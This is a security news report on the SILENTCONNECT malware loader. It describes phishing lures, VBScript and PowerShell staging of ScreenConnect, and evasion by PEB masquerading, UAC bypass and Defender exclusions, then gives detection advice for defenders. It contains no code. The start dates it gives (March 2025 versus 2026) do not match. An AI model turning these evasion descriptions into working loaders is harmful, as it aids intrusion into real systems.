Malware - SILENTCONNECT Deploys ScreenConnect via VBScript
Basically, SILENTCONNECT is a sneaky malware that tricks users to install dangerous software on their computers.
SILENTCONNECT malware is stealthily targeting Windows machines, using VBScript and PowerShell to deploy ScreenConnect. This poses a significant risk to corporate security. Organizations must enhance their defenses to combat this sophisticated threat.
What Happened
SILENTCONNECT is a newly discovered malware loader that has been targeting Windows machines since March 2025. This multi-stage malware employs VBScript and PowerShell to install the remote monitoring tool, ScreenConnect, on compromised systems. Once installed, ScreenConnect allows attackers to gain full control over the infected machines, posing a serious threat to corporate environments worldwide.
The infection process begins with a phishing email that appears to contain a legitimate invitation or proposal. When the victim clicks on the link, they are redirected to a Cloudflare CAPTCHA page. After verifying they are human, a VBScript file named E-INVITE.vbs is automatically downloaded. The attackers use convincing filenames like Proposal-03-2026.vbs to lower the victim's defenses before executing the malware.
Who's Being Targeted
Organizations across various sectors are at risk from this sophisticated attack. The use of trusted platforms like Cloudflare and Google Drive to host malicious files makes detection difficult for many security systems. Researchers from Elastic Security Labs identified this campaign after observing multiple alerts triggered by the malware's behavior in early March 2026.
The malware's clever use of living-off-the-land techniques allows it to blend into normal Windows activity, making it challenging for security tools to spot. By disguising its VBScript payload as a children's story, it further deceives victims into executing the malware.
Signs of Infection
Once the SILENTCONNECT loader is active, it employs various evasion techniques to avoid detection. After a brief sleep period, it uses NtAllocateVirtualMemory to allocate executable memory and copies a shellcode stub into that region. This shellcode retrieves the Process Environment Block (PEB) address, allowing the malware to operate at a low system level while bypassing common monitoring tools.
The malware performs PEB masquerading by overwriting its module information to appear as a harmless Windows utility. This technique helps it evade detection by endpoint detection and response (EDR) systems, which often rely on PEB data to identify suspicious processes. The loader also executes a User Account Control (UAC) bypass and adds an exclusion for Microsoft Defender to further conceal its activities.
How to Protect Yourself
Organizations should take proactive measures to defend against SILENTCONNECT and similar threats. Regular audits for unauthorized remote monitoring tool installations are crucial. Monitoring outbound traffic for connections to unknown ScreenConnect servers can also help identify compromised systems.
Security teams should be vigilant about PowerShell commands that combine Add-Type with remote downloads. Alerts should be set for VBScript files fetched from the internet and any unexpected changes to Microsoft Defender exclusions. Tracking NtAllocateVirtualMemory calls from .NET processes can also aid in detecting this threat before it leads to a full compromise.
Cyber Security News